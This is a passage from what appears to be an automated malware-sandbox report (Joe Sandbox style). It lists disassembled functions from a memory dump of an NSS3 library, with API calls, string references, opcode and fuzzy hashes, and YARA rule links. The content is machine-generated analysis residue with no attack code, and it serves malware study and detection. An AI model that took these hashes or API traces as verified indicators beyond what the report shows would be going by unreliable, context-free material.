                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C472D6B,?,?,00000000), ref: 6C49AE89
                                                                                                                                                                                                                          • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C472D6B,?,?,00000000), ref: 6C49AE96
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C472D6B,?,?), ref: 6C49AEA3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 754562246-0
                                                                                                                                                                                                                          • Opcode ID: e5cc729b04a7659f968be7c449c17ec258a42a5e58b5cdf48d52f7635dfc7a2d
                                                                                                                                                                                                                          • Instruction ID: 321ad2081eecc3de372e147ef36d63d32fa59c4435700b0cdd8de3b8b6f9dc93
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5cc729b04a7659f968be7c449c17ec258a42a5e58b5cdf48d52f7635dfc7a2d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E01A966F8503057EB01D16CAC85E9B3B988F9765DF090035E905D7B01FB15D90642E3
                                                                                                                                                                                                                          Function 6C58BDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BDC3
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BDCA
                                                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BDE9
                                                                                                                                                                                                                          • free.MOZGLUE(?,00000000,00000000,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BE21
                                                                                                                                                                                                                          • free.MOZGLUE(00000000,00000000,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BE32
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$CriticalDeleteDestroyMonitorSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3662805584-0
                                                                                                                                                                                                                          • Opcode ID: 341707c39abc3b3aa0be7433ac06a5d32ee60f5f23b627a20c59350e84509f3e
                                                                                                                                                                                                                          • Instruction ID: 4c18cc17c99d0bda061c3d777b40529af16c50dd3dd6502fa36b5dcbccf03829
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 341707c39abc3b3aa0be7433ac06a5d32ee60f5f23b627a20c59350e84509f3e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E11E6B5B027109FDF00DF29CC49B063BB9AB4A254B4A0029D50AC7710E732B914CBAD
                                                                                                                                                                                                                          Function 6C587C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_Free.NSS3(?), ref: 6C587C73
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C587C83
                                                                                                                                                                                                                          • malloc.MOZGLUE(00000001), ref: 6C587C8D
                                                                                                                                                                                                                          • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C587C9F
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C587CAD
                                                                                                                                                                                                                            • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 105370314-0
                                                                                                                                                                                                                          • Opcode ID: aa6d858522c73e0ee2d0b4b5f5ecfcdd687e1f868ac8b6e6eaf190db2a467bd6
                                                                                                                                                                                                                          • Instruction ID: 1a4683371a552569a3f9e6e6791d79433ae4bd27287c5d34b2825c5909e2e8b2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa6d858522c73e0ee2d0b4b5f5ecfcdd687e1f868ac8b6e6eaf190db2a467bd6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DAF0F6F1A11626BFEB009F3A9C09947776CEF502A5B018435EC0DC7B00EB30E514CAE5
                                                                                                                                                                                                                          Function 6C58ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(6C58A6D8), ref: 6C58AE0D
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C58AE14
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(6C58A6D8), ref: 6C58AE36
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C58AE3D
                                                                                                                                                                                                                          • free.MOZGLUE(00000000,00000000,?,?,6C58A6D8), ref: 6C58AE47
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 682657753-0
                                                                                                                                                                                                                          • Opcode ID: dadac7ed899ce4d47329d58581ce90f9b03f57ff5357f8ce2846c9be4c27f540
                                                                                                                                                                                                                          • Instruction ID: 63c11e11e136d8b2d8d2b051aedbe2f1fba97aadc62188d5494a53fb8bd7098f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dadac7ed899ce4d47329d58581ce90f9b03f57ff5357f8ce2846c9be4c27f540
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BFF06275202E01A7CA10DFA99C0C95B7778FE86679715032CE52A87980E732F216C7D9
                                                                                                                                                                                                                          Function 6C4F9850 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 233COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000,?,?), ref: 6C4F9AE4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error
                                                                                                                                                                                                                          • String ID: ($0@Zl$`@Zl
                                                                                                                                                                                                                          • API String ID: 2619118453-2516348057
                                                                                                                                                                                                                          • Opcode ID: 55a0d0094c98e3766b7fd2c89971627cfb9fce7cf0cd5a7b7a8b8b040e23e48d
                                                                                                                                                                                                                          • Instruction ID: 7e3f0779d9d531b9ac4ac340fe43c3ccb13eeac468ec88b32443db8ac58dc3e7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55a0d0094c98e3766b7fd2c89971627cfb9fce7cf0cd5a7b7a8b8b040e23e48d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1291E231E042599BDF10EF95C840FEDBBB1BFD8309F248129E8656BB51D3329986CB90
                                                                                                                                                                                                                          Function 6C40BCD0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(6C5AAAF9,?), ref: 6C40BE37
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_mprintf
                                                                                                                                                                                                                          • String ID: Xl$PXl$winFileSize
                                                                                                                                                                                                                          • API String ID: 4246442610-4264483736
                                                                                                                                                                                                                          • Opcode ID: 0df894d65e209db408c3cabff87dfe561264e712704d576b5caf7f537dea1b31
                                                                                                                                                                                                                          • Instruction ID: c42ba40ecc704de23f8c8b1758f564eb428a3e2b006e247af17862188f5a966d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0df894d65e209db408c3cabff87dfe561264e712704d576b5caf7f537dea1b31
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5619D31B44605EFDB04CF28C890EA9B7B1FF8A314B0586B9D8158BB40D730E956CBD9
                                                                                                                                                                                                                          Function 6C417C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C417D35
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 632333372-598938438
                                                                                                                                                                                                                          • Opcode ID: fecea2fb170f99d796c5708334da1392fc63261259db67e9548aef7e977f3120
                                                                                                                                                                                                                          • Instruction ID: 814d588682882d07cfb636c79c5a3531f419145f5956a5750f2d5d1a0391170b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fecea2fb170f99d796c5708334da1392fc63261259db67e9548aef7e977f3120
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A31F471E0C22997C710CF9EC880DBDBBF1AF44345B590196E484B7B85D271E842C7A4
                                                                                                                                                                                                                          Function 6C406C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C406D36
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • database corruption, xrefs: 6C406D2A
                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C406D20
                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C406D2F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 632333372-598938438
                                                                                                                                                                                                                          • Opcode ID: a57f99850d5ee161323fad6a601f788b87cc56d49023785b80d75a667b4620e6
                                                                                                                                                                                                                          • Instruction ID: 98b64c19365427c2bf04059f64183717dc07b67c87857371dd6b0e827477b3fe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a57f99850d5ee161323fad6a601f788b87cc56d49023785b80d75a667b4620e6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9321DE707443059BD710CF1AD841F9AB7E2AF84308F148A2DDC5A9BB51E371E98ACB92
                                                                                                                                                                                                                          Function 6C4E2FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+Nl,6C4E32C2,<+Nl,00000000,00000000,?), ref: 6C4E2FDA
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C4E300B
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C4E302A
                                                                                                                                                                                                                            • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
                                                                                                                                                                                                                            • Part of subcall function 6C4BC3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C4BC45D
                                                                                                                                                                                                                            • Part of subcall function 6C4BC3D0: TlsGetValue.KERNEL32 ref: 6C4BC494
                                                                                                                                                                                                                            • Part of subcall function 6C4BC3D0: EnterCriticalSection.KERNEL32(?), ref: 6C4BC4A9
                                                                                                                                                                                                                            • Part of subcall function 6C4BC3D0: PR_Unlock.NSS3(?), ref: 6C4BC4F4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
                                                                                                                                                                                                                          • String ID: <+Nl
                                                                                                                                                                                                                          • API String ID: 2538134263-2237628156
                                                                                                                                                                                                                          • Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                                                                                                                                          • Instruction ID: c287604cf340fe1ea6c0460f3ccbc1df82e26030b2e104b932eb8692938b116a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0311C4B6A001046BDB00DE64DC00F9B77AA9B85279F1A8138EC1CD7790E772E915C7E1
                                                                                                                                                                                                                          Function 6C53CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C53CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C53CC7B), ref: 6C53CD7A
                                                                                                                                                                                                                            • Part of subcall function 6C53CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C53CD8E
                                                                                                                                                                                                                            • Part of subcall function 6C53CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C53CDA5
                                                                                                                                                                                                                            • Part of subcall function 6C53CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C53CDB8
                                                                                                                                                                                                                          • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C53CCB5
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(6C5D14F4,6C5D02AC,00000090), ref: 6C53CCD3
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(6C5D1588,6C5D02AC,00000090), ref: 6C53CD2B
                                                                                                                                                                                                                            • Part of subcall function 6C459AC0: socket.WSOCK32(?,00000017,6C4599BE), ref: 6C459AE6
                                                                                                                                                                                                                            • Part of subcall function 6C459AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C4599BE), ref: 6C459AFC
                                                                                                                                                                                                                            • Part of subcall function 6C460590: closesocket.WSOCK32(6C459A8F,?,?,6C459A8F,00000000), ref: 6C460597
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                                          • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                                          • API String ID: 1231378898-412307543
                                                                                                                                                                                                                          • Opcode ID: ac2b3202054891969072743bb4959f1abcd13bab9cf48b95bd193201cc593f13
                                                                                                                                                                                                                          • Instruction ID: 8c8b29e72057abea4f5a9f5cdbc56e4fab84a335fadff71d1693fb485923b6ef
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac2b3202054891969072743bb4959f1abcd13bab9cf48b95bd193201cc593f13
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD1160F5B223609EEB009F599C06B433AF89396628F161129E41ACBB42E775F4044FDE
                                                                                                                                                                                                                          Function 6C488850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C490715), ref: 6C488859
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C488874
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C48888D
